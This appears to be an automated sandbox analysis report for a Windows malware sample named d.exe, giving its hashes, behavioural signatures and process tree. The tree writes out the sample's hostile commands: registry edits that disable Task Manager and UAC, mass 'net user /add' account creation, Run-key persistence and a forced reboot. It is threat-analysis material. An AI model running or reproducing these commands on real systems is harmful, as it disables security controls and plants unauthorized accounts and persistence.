Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
10s -
max time network
14s -
platform
windows10-1703_x64 -
resource
win10-20230220-es -
resource tags
arch:x64arch:x86image:win10-20230220-eslocale:es-esos:windows10-1703-x64systemwindows -
submitted
02/04/2023, 13:41
Static task
static1
Behavioral task
behavioral1
Sample
d.exe
Resource
win10-20230220-es
Errors
General
-
Target
d.exe
-
Size
130KB
-
MD5
29b5eb1472c4de55ea35adc57f9bbca5
-
SHA1
d4187fb7bbc4a4a03393e0f37f451227c9a3420e
-
SHA256
b0e2ea2424bbbacdd3a9f11eb87a05517e24b36aa793c033e491e1c6a5647b3d
-
SHA512
2ae14a8d8856f60c0ad37c04ce521dc387717c2f63ba45d4a808f50cce826cbfdf7b3f1239ae29f46fe14ab75da6b312a90a85a7203b7ff5f05ec8d5254fb28e
-
SSDEEP
3072:0V3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPiVV:Zt5hBPi0BW69hd1MMdxPe9N9uA069TBE
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\d.bat" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\d.bat" reg.exe Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system.ini cmd.exe File created C:\Windows\d.bat cmd.exe File opened for modification C:\Windows\d.bat cmd.exe File opened for modification C:\Windows\win.ini cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 4 IoCs
pid Process 5112 reg.exe 1588 reg.exe 3420 reg.exe 4064 reg.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4864 vlc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4864 vlc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeShutdownPrivilege 4036 shutdown.exe Token: SeRemoteShutdownPrivilege 4036 shutdown.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4864 vlc.exe 4864 vlc.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 4864 vlc.exe 4864 vlc.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4864 vlc.exe 2868 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1120 wrote to memory of 1452 1120 d.exe 66 PID 1120 wrote to memory of 1452 1120 d.exe 66 PID 1452 wrote to memory of 1900 1452 cmd.exe 68 PID 1452 wrote to memory of 1900 1452 cmd.exe 68 PID 1452 wrote to memory of 5112 1452 cmd.exe 69 PID 1452 wrote to memory of 5112 1452 cmd.exe 69 PID 1452 wrote to memory of 1588 1452 cmd.exe 70 PID 1452 wrote to memory of 1588 1452 cmd.exe 70 PID 1452 wrote to memory of 2688 1452 cmd.exe 71 PID 1452 wrote to memory of 2688 1452 cmd.exe 71 PID 2688 wrote to memory of 4048 2688 net.exe 72 PID 2688 wrote to memory of 4048 2688 net.exe 72 PID 1452 wrote to memory of 4604 1452 cmd.exe 73 PID 1452 wrote to memory of 4604 1452 cmd.exe 73 PID 4604 wrote to memory of 2068 4604 net.exe 74 PID 4604 wrote to memory of 2068 4604 net.exe 74 PID 1452 wrote to memory of 4644 1452 cmd.exe 75 PID 1452 wrote to memory of 4644 1452 cmd.exe 75 PID 4644 wrote to memory of 2184 4644 net.exe 76 PID 4644 wrote to memory of 2184 4644 net.exe 76 PID 1452 wrote to memory of 3668 1452 cmd.exe 77 PID 1452 wrote to memory of 3668 1452 cmd.exe 77 PID 3668 wrote to memory of 3672 3668 net.exe 78 PID 3668 wrote to memory of 3672 3668 net.exe 78 PID 1452 wrote to memory of 4736 1452 cmd.exe 79 PID 1452 wrote to memory of 4736 1452 cmd.exe 79 PID 4736 wrote to memory of 4780 4736 net.exe 80 PID 4736 wrote to memory of 4780 4736 net.exe 80 PID 1452 wrote to memory of 2212 1452 cmd.exe 81 PID 1452 wrote to memory of 2212 1452 cmd.exe 81 PID 2212 wrote to memory of 1932 2212 net.exe 82 PID 2212 wrote to memory of 1932 2212 net.exe 82 PID 1452 wrote to memory of 1432 1452 cmd.exe 83 PID 1452 wrote to memory of 1432 1452 cmd.exe 83 PID 1432 wrote to memory of 2156 1432 net.exe 84 PID 1432 wrote to memory of 2156 1432 net.exe 84 PID 1452 wrote to memory of 2444 1452 cmd.exe 85 PID 1452 wrote to memory of 2444 1452 cmd.exe 85 PID 2444 wrote to memory of 3744 2444 net.exe 86 PID 2444 wrote to memory of 3744 2444 net.exe 86 PID 1452 wrote to memory of 3748 1452 cmd.exe 87 PID 1452 wrote to memory of 3748 1452 cmd.exe 87 PID 3748 wrote to memory of 4756 3748 net.exe 88 PID 3748 wrote to memory of 4756 3748 net.exe 88 PID 1452 wrote to memory of 4856 1452 cmd.exe 89 PID 1452 wrote to memory of 4856 1452 cmd.exe 89 PID 4856 wrote to memory of 1324 4856 net.exe 90 PID 4856 wrote to memory of 1324 4856 net.exe 90 PID 1452 wrote to memory of 1144 1452 cmd.exe 91 PID 1452 wrote to memory of 1144 1452 cmd.exe 91 PID 1144 wrote to memory of 4484 1144 net.exe 92 PID 1144 wrote to memory of 4484 1144 net.exe 92 PID 1452 wrote to memory of 4944 1452 cmd.exe 94 PID 1452 wrote to memory of 4944 1452 cmd.exe 94 PID 4944 wrote to memory of 4748 4944 net.exe 93 PID 4944 wrote to memory of 4748 4944 net.exe 93 PID 1452 wrote to memory of 4972 1452 cmd.exe 95 PID 1452 wrote to memory of 4972 1452 cmd.exe 95 PID 4972 wrote to memory of 4968 4972 net.exe 96 PID 4972 wrote to memory of 4968 4972 net.exe 96 PID 1452 wrote to memory of 440 1452 cmd.exe 97 PID 1452 wrote to memory of 440 1452 cmd.exe 97 PID 440 wrote to memory of 816 440 net.exe 98 PID 440 wrote to memory of 816 440 net.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\d.exe"C:\Users\Admin\AppData\Local\Temp\d.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\939A.tmp\939B.tmp\939C.bat C:\Users\Admin\AppData\Local\Temp\d.exe"2⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msg.vbs"3⤵PID:1900
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:5112
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:1588
-
-
C:\Windows\system32\net.exenet user 28009 /add3⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 28009 /add4⤵PID:4048
-
-
-
C:\Windows\system32\net.exenet user 25058 /add3⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 25058 /add4⤵PID:2068
-
-
-
C:\Windows\system32\net.exenet user 23295 /add3⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 23295 /add4⤵PID:2184
-
-
-
C:\Windows\system32\net.exenet user 5760 /add3⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 5760 /add4⤵PID:3672
-
-
-
C:\Windows\system32\net.exenet user 12323 /add3⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 12323 /add4⤵PID:4780
-
-
-
C:\Windows\system32\net.exenet user 31924 /add3⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 31924 /add4⤵PID:1932
-
-
-
C:\Windows\system32\net.exenet user 4287 /add3⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 4287 /add4⤵PID:2156
-
-
-
C:\Windows\system32\net.exenet user 21721 /add3⤵
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 21721 /add4⤵PID:3744
-
-
-
C:\Windows\system32\net.exenet user 32651 /add3⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 32651 /add4⤵PID:4756
-
-
-
C:\Windows\system32\net.exenet user 29537 /add3⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 29537 /add4⤵PID:1324
-
-
-
C:\Windows\system32\net.exenet user 29006 /add3⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 29006 /add4⤵PID:4484
-
-
-
C:\Windows\system32\net.exenet user 2990 /add3⤵
- Suspicious use of WriteProcessMemory
PID:4944
-
-
C:\Windows\system32\net.exenet user 24261 /add3⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 24261 /add4⤵PID:4968
-
-
-
C:\Windows\system32\net.exenet user 8903 /add3⤵
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 8903 /add4⤵PID:816
-
-
-
C:\Windows\system32\net.exenet user 29468 /add3⤵PID:4988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 29468 /add4⤵PID:2176
-
-
-
C:\Windows\system32\net.exenet user 28799 /add3⤵PID:4364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 28799 /add4⤵PID:4368
-
-
-
C:\Windows\system32\net.exenet user 8929 /add3⤵PID:4564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 8929 /add4⤵PID:4488
-
-
-
C:\Windows\system32\net.exenet user 27401 /add3⤵PID:3836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 27401 /add4⤵PID:4348
-
-
-
C:\Windows\system32\net.exenet user 6102 /add3⤵PID:4380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 6102 /add4⤵PID:4412
-
-
-
C:\Windows\system32\net.exenet user 22551 /add3⤵PID:4372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 22551 /add4⤵PID:4672
-
-
-
C:\Windows\system32\net.exenet user 13 /add3⤵PID:3372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 13 /add4⤵PID:3456
-
-
-
C:\Windows\system32\net.exenet user 22508 /add3⤵PID:4292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 22508 /add4⤵PID:3452
-
-
-
C:\Windows\system32\net.exenet user 823 /add3⤵PID:3388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 823 /add4⤵PID:4876
-
-
-
C:\Windows\system32\net.exenet user 16912 /add3⤵PID:5020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 16912 /add4⤵PID:2040
-
-
-
C:\Windows\system32\net.exenet user 30473 /add3⤵PID:5060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 30473 /add4⤵PID:5088
-
-
-
C:\Windows\system32\net.exenet user 10369 /add3⤵PID:4996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 10369 /add4⤵PID:2388
-
-
-
C:\Windows\system32\net.exenet user 29729 /add3⤵PID:2384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 29729 /add4⤵PID:1500
-
-
-
C:\Windows\system32\net.exenet user 15769 /add3⤵PID:3336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 15769 /add4⤵PID:3376
-
-
-
C:\Windows\system32\net.exenet user 14043 /add3⤵PID:5072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 14043 /add4⤵PID:1760
-
-
-
C:\Windows\system32\net.exenet user 31237 /add3⤵PID:3132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 31237 /add4⤵PID:4132
-
-
-
C:\Windows\system32\net.exenet user 21484 /add3⤵PID:2792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 21484 /add4⤵PID:2700
-
-
-
C:\Windows\system32\net.exenet user 2935 /add3⤵PID:2716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 2935 /add4⤵PID:1776
-
-
-
C:\Windows\system32\net.exenet user 18115 /add3⤵PID:988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 18115 /add4⤵PID:4228
-
-
-
C:\Windows\system32\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\d.bat /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:3420
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\d.bat /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:4064
-
-
C:\Windows\system32\shutdown.exeshutdown -r -t 00 -c "blackhost virus maker"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 2990 /add1⤵PID:4748
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\WaitUnprotect.m4a"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4864
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3ad2855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2868
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d734ebb2d1a46aad6f79e4ed263d4d40
SHA163f17dbfde5ee6cb75c4cf346b9e7709a0f0b8fb
SHA256559f3175f533116bfb441f4c15f18a706a558b40bed026d94779d977e8026709
SHA512832e14de24558b12af0ce6503766d21aaae87f2ad5411aca6a6d3e04245f151f1c14a4e3867efd5ac5f1a04436ca0415af49c83a24b068e14963e36691bc2091
-
Filesize
35B
MD5019dd451c91f63928aae37f251491212
SHA13507388e9feeec97a83106920a73e0d65157d3b5
SHA256c585e37e06e2901ccfdabef79b9318f254714382d5c8f97a020f5cfb2c084af8
SHA5122b31b9b1d17b5df8437a5a362188368ab458621f78aa7cbef5050a00376c1fff539eec4f152259dc973664b99ba6110f40ed3ca37b0371a25f88120a92fe4ddd
-
Filesize
130KB
MD529b5eb1472c4de55ea35adc57f9bbca5
SHA1d4187fb7bbc4a4a03393e0f37f451227c9a3420e
SHA256b0e2ea2424bbbacdd3a9f11eb87a05517e24b36aa793c033e491e1c6a5647b3d
SHA5122ae14a8d8856f60c0ad37c04ce521dc387717c2f63ba45d4a808f50cce826cbfdf7b3f1239ae29f46fe14ab75da6b312a90a85a7203b7ff5f05ec8d5254fb28e